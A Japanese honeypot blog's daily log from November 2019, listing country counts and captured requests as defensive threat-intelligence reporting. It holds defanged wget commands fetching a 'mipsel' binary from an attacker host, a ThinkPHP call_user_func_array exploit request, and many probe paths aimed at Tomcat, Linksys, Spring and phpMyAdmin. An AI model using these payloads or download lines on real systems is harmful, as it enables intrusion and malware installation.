23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(244日目)

2019/11/15(金)

トータルは4117件でした。

ハンティングログは以下です。

86.183.0[.]88 wget+hxxp[:]//185.172.110[.]220/mipsel
65.32.180[.]57 wget+hxxp[:]//185.172.110[.]220/mipsel
176.138.141[.]93 wget+hxxp[:]//185.172.110[.]220/mipsel
117.99.89[.]58 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

IPのロケーション別の件数は以下です。

アルゼンチン 4002
イタリア 44
アメリ 16
中国 9
ブラジル 6
ドイツ 5
オランダ 5
イラン 5
エクアドル 3
シンガポール 2
キプロス 2
フランス 2
インド 2
トルコ 1
ルーマニア 1
イギリス 1
グルジア 1
オーストラリア 1
マレーシア 1
チェコ 1
イラク 1
インドネシア 1
ラトビア 1
ギリシャ 1
カナダ 1
タイ 1
セルビア 1

f:id:sec23:20191205225743p:plain

件数 概要 リクエス
4002 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
57 アクセス GET /
4 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
4 phpMyAdminの調査 GET /admin-scripts.asp
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 不正中継の調査 GET hxxp[:]//www.sogou.com/?0.83460904018330424840528
1 不正中継の調査 GET hxxp[:]//www.lycos.de/?0.297031008042047286488160
1 調査 GET /script
1 phpMyAdminの調査 GET /wp/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /wp-phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /wp-phpmyadmin/phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /wp-content/plugins/wp-phpmyadmin/wp-phpmyadmin/phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /wordpress/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /websql/scripts/setup.php
1 phpMyAdminの調査 GET /webapps/phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /web/phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 phpMyAdminの調査 GET /sqladmin/scripts/setup.php
1 phpMyAdminの調査 GET /scripts/setup.php
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php/index.php
1 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /phpmy/scripts/setup.php
1 phpMyAdminの調査 GET /phpmy-admin/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin2/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin-2.8.2/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin-2.8.1/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin-2.8.0/scripts/setup.php
1 phpMyAdminの調査 GET /phpMyAdmin-2.8.0.4/scripts/setup.php
1 phpMyAdminの調査 GET /php/scripts/setup.php
1 phpMyAdminの調査 GET /php/phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /php-my-admin/scripts/setup.php
1 phpMyAdminの調査 GET /php-admin/scripts/setup.php
1 phpMyAdminの調査 GET /pHpMyAdMiN/scripts/setup.php
1 phpMyAdminの調査 GET /mysqladmin/scripts/setup.php
1 phpMyAdminの調査 GET /mysql/scripts/setup.php
1 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 phpMyAdminの調査 GET /dbadmin/scripts/setup.php
1 phpMyAdminの調査 GET /db/scripts/setup.php
1 phpMyAdminの調査 GET /configuracion/phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /admin/scripts/setup.php
1 phpMyAdminの調査 GET /admin/phpmyadmin/scripts/setup.php
1 phpMyAdminの調査 GET /_phpMyAdmin/scripts/setup.php
1 phpMyAdminの調査 GET /PMA/scripts/setup.php
1 phpMyAdminの調査 GET /MySQL/scripts/setup.php
1 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php